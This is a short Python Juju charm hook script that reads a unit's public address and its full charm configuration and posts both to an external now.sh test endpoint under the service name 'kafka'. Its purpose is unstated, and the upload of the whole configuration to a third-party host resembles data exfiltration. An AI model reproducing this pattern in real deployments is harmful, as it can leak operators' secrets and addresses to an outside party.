#!/usr/bin/env python

from charmhelpers.core.hookenv import unit_get, config
import requests

address = unit_get("public-address")
cfg = config()
r = requests.post("https://test-api-ddlrzsfdsc.now.sh/", data = {"service": "kafka", "public-address": address, "port": 80, "config": cfg})
